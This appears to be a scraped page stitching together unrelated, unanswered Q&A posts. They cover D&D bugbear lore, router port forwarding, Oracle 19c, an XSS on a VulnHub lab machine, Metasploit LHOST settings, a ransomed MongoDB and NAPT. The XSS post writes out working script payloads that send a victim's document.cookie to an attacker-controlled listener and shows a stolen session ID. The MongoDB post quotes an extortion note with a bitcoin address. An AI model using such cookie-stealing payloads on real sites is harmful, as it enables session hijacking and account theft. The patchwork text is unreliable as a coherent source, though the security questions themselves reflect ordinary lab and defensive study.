Which Sword Coast port has bugbears loading and unloading ships?

I remember reading in some published book (most probably from the 3e era but I’m not sure; surely not from 5e) that in a certain port in the Sword Coast (I’d say Waterdeep, but Neverwinter and Luskan are also possible given where our characters were located at that time) bugbears sometimes look for employment as load workers at the docks, but they often get into trouble because other people around there treat them as stupid just because of their looks.

Bugbears have average intelligence and wisdom, so they’re rightfully enraged by the accusation, but they have a bad temper and fights ensue.

Where did I read this piece of lore, and which was the town?

Localhost website not accessible from Public IP despite port forwarding

My tiny office has 1 router, which is connected to ADSL line on one end and my laptop on other end. In office, laptop’s local IP is 192.168.1.2.

On office router, I have setup port (22) forwarding for SSH access. I also have DuckDNS script that allows me to ssh -v -t -L 5900:localhost:5900 myname.duckdns.org into my office laptop whenever I want.

I followed the same port-forwarding procedure to configure my router to forward Port 8082 to 192.168.1.2 (TCP, WAN interface is pppoe2). I ran a python/nodejs http server listening on 0.0.0.0:8082.

If I try to access my newly spun server from public IP I get timeout. This is the problem. I can SSH into my remote machine, but website hosted on it doesn’t work

Steps tried:

I take remote desktop of office laptop (using port 5900 for x11 forwarding) and find that firefox can open localhost:8082, 127.0.0.1:8082 and 192.168.1.2:8082 properly.

I tried shutting down extra services like gogs and nginx (which was listening on port 80 even though I didn’t tell it to) via systemctl, but still no luck.

Further, curl http://PUBLIC_IP:8082 gives different outputs:

  1. At home, in my Cmder I get curl: (7) Failed to connect to PUBLIC_IP port 8082: Timed out
  2. However, in SSH terminal (i.e. of remote machine), I get curl: (7) Failed to connect to PUBLIC_IP port 8082: Connection refused

Why is connection refused?

Thanks to @davidgo, I tried

$   sudo tcpdump -vv -i enp7s0 | grep 8082 tcpdump: listening on enp7s0, link-type EN10MB (Ethernet), capture size 262144 bytes 

If I curl localhost:8082 or 192.168.1.2:8082 I see 200 on server logs but I don’t see any output in the above command.
But if I curl PUBLIC_IP:8082 from

  1. inside SSH session I get
    duckDNSsubDomain.40626 > abts-north-dynamic-031.P3.P2.P1.airtelbroadband.in.8082: Flags [S], cksum 0x469a (incorrect -> 0x84f5), seq 18095393, win 64240, options [mss 1460,sackOK,TS val 2474578357 ecr 0,nop,wscale 7], length 0     abts-north-dynamic-031.P3.P2.P1.airtelbroadband.in.8082 > duckDNSsubDomain.40626: Flags [R.], cksum 0x8cea (correct), seq 0, ack 18095394, win 0, length 0 

and a quick connection refused complain by curl (BTW my public IPv4 looks like P1.P2.P3.31.

  1. And if I do the same curl from my home computer I see
    157.32.251.70.50664 > duckDNSsubDomain.8082: Flags [S], cksum 0x299d (correct), seq 132055921, win 64240, options [mss 1370,nop,wscale 8,nop,nop,sackOK], length 0     157.32.251.70.50664 > duckDNSsubDomain.8082: Flags [S], cksum 0x299d (correct), seq 132055921, win 64240, options [mss 1370,nop,wscale 8,nop,nop,sackOK], length 0     157.32.251.70.50664 > duckDNSsubDomain.8082: Flags [S], cksum 0x299d (correct), seq 132055921, win 64240, options [mss 1370,nop,wscale 8,nop,nop,sackOK], length 0     157.32.251.70.50664 > duckDNSsubDomain.8082: Flags [S], cksum 0x299d (correct), seq 132055921, win 64240, options [mss 1370,nop,wscale 8,nop,nop,sackOK], length 0     157.32.251.70.50664 > duckDNSsubDomain.8082: Flags [S], cksum 0x299d (correct), seq 132055921, win 64240, options [mss 1370,nop,wscale 8,nop,nop,sackOK], length 0  

and curl fails with timeout.

Now I am guessing my ISP doesn’t like random ports. So I tried hosting my webserver on port 80. Again, localhost and 192.186.1.2 work as expected but http://PUBLIC_IP:80/ opens up router control panel 🙁

So I try hosting it on a well-known port that’s not 80 or 443. I choose 21 (FTP), use sudo to run webserver listening on 0.0.0.0:21 but firefox/chrome don’t let me open it and curl hangs for a while before failing with a timeout.

Oracle 19c express manager not loading, listener will not register https port after exec dbms_xdb_config.gethttpsport()

We just set up a new oracle 19c install on a VM Windows Server 2020. I have been struggling trying to get the Express Manager working. At the end of the installation Oracle notified me that I can access the Express Manager at https://%localhost%:5500/em But upon visiting the website in chrome the connection is refused. I disabled the firewall and receive the same message. I went through the oracle documentation and ensured that dbms_xdb_config.gethttpsport() outputs 5500.

After running lsnrctl status I noticed that under listeners I am missing port 5500. I searched other users with the same issue they all have an entry for port 5500 like the following.

(DESCRIPTION=(ADDRESS=(PROTOCOL=tcps)(HOST=HOSTNAME.domain)(PORT=5500))(Security=(my_wallet_directory=C:\ORACLE\admin\ecoomdb\xdb_wallet))(Presentation=HTTP)(Session=RAW))     Services Summary...  

According to Oracle documentation when I run the command dbms_xdb_config.gethttpsport(5500) the listener should register the port. But after running the command muliple times this is not happening.

XSS on port other than 80 not working

I am currently doing a boot2root VulnHub machine and I have found an XSS entry point to steal admin cookies.

The strange thing is that if I run my SimpleHTTPServer on port 80 then the following payload triggers

<script>document.write('<img src="http://192.168.1.130/'+document.cookie+'" width=0 height=0 border=0 />');</script>

And I get the cookie like this

192.168.1.14 - - [13/Sep/2020 09:23:36] "GET /PHPSESSID=m18d10ghina3pbtlhn5sttrm8o HTTP/1.1" 404 -

But if I run my SimpleHTTPServer let’s say on port 4242 or any other port (I have tried a handful), the following payload does not trigger

<script>document.write('<img src="http://192.168.1.130:4242/'+document.cookie+'" width=0 height=0 border=0 />');</script>

Or at least I don’t see anything.

Please note that the boot2root VM seems to call every minute without fail.

I don’t know why this is happening. Does SimpleHTTPServer only work on port 80? It could be as simple as that, I guess, but I see examples on the internet with other ports being used so I doubt this is the case.

Do I need port forwarding for msfconsole remote target exploitation

I was running a series of test attacks on my virtual test machine. Here i had to set the RHOST option to the Ip-address of the target and LHOST to the Ip-address of my local machine. I am certain that this works well locally because both machines would be on the same private network, with private ip addresse. But what if i had my linux machine(not vm) connected to my phone which is serving as a router. If i ran such an attack on a machine on the internet, RHOST would be the public Ip-address of the target machine; i am skeptical as to what ip address i would put for my LHOST option; can i just use my private ip address(given to my linux from my phone hotspot) as this option or do i have to type in the public ip-address for my phone. And if i do have to put in my phone’s public IP is port forwarding needed in such a case or it would work just fine?

Mongo DB hacked (read_me_to_recover) without the port exposed in the firewall?

I Have recently setup parse-server on a DO vps, using 3 docker containers, one for parse-server, one for parse-server dashboard and one for mongodb. Because I am just testing this setup I left the mongo container as it is (mongodb://mongo:27017/dev). I have NGINX (not in docker) running as a reverse proxy (to get SSL), it forwards port 80 and 443 to http://127.0.0.1:4040 internal (the parse dashboard web gui). and it routes 1338 to http://127.0.0.1:1337 the parse server (API) itself. This parse server connects to my mongo DB internally.

This is the first time I am using Docker and mongoDB, because of this setup and the mongo db port not open I thought it would be half-decently safe. My question is, how did the hacker breach my database? There was nothing of value stored but there might be in the future. I don’t think he exploited my parse server because I could see the connection coming from a cpython client (the parse connection showed as nodeJS client.

I have added: NGINX, FIREWALL,Docker processes, Mongo LOG lines

nginx terminal

{"t":{"$  date":"2020-08-13T12:23:14.165+00:00"},"s":"I",  "c":"NETWORK",  "id":22943,   "ctx":"listener","msg":"connection accepted","attr":{"remote":"46.182.106.190:39672","sessionId":31,"connectionCount":3}} {"t":{"$  date":"2020-08-13T12:23:14.359+00:00"},"s":"I",  "c":"NETWORK",  "id":51800,   "ctx":"conn31","msg":"client metadata","attr":{"remote":"46.182.106.190:39672","client":"conn31","doc":{"driver":{"name":"PyMong                      o","version":"3.10.1"},"os":{"type":"Linux","name":"Linux","architecture":"x86_64","version":"4.15.0-112-generic"},"platform":"CPython 3.6.9.final.0"}}} {"t":{"$  date":"2020-08-13T12:23:15.941+00:00"},"s":"I",  "c":"COMMAND",  "id":20337,   "ctx":"conn31","msg":"dropDatabase - starting","attr":{"db":"READ_ME_TO_RECOVER_YOUR_DATA"}} 
> db.README.find(); { "_id" : ObjectId("5f3536cd2a546e2eea8211eb"), "content" : "All your data is a backed up. You must pay 0.015 BTC to 145Nny3Gi6nWVBz45Gv9SqxFaj                                                                                              uwTb2qTw 48 hours for recover it. After 48 hours expiration we will leaked and exposed all your data. In case of refusal to pay, we will contac                                                                                              t the General Data Protection Regulation, GDPR and notify them that you store user data in an open form and is not safe. Under the rules of the                                                                                               law, you face a heavy fine or arrest and your base dump will be dropped from our server! You can buy bitcoin here, does not take much time to                                                                                               buy https://localbitcoins.com with this guide https://localbitcoins.com/guides/how-to-buy-bitcoins After paying write to me in the mail with yo                                                                                              ur DB IP: restore_base@tuta.io" } 

Is it safe to expose port 22 on a database VM?

I have seen many answers to this question in different scenarios but I am still unsure of the actual answer.

I have a VM in the cloud (Azure), which will be hosting my production database. Is it safe to have port 22 open for my SSH connection? it also has a public IP address, is this safe too?

This is my first time having to concern myself with these types of questions so apologies for the lack of understanding.

Is IP masquerade and Network Address Port Translation(NAPT) the same?

Is IP masquerade and Network Address Port Translation(NAPT) the same? I’m not sure whether it is the same thing or not but I realized the mechanism is almost the same where both IP masquerade and NAPT changes TCP/UDP port and many-to-one relation is allowed:multiple private addresses share one global IP address. If it is different which part is IP masquerade and NAPT is different?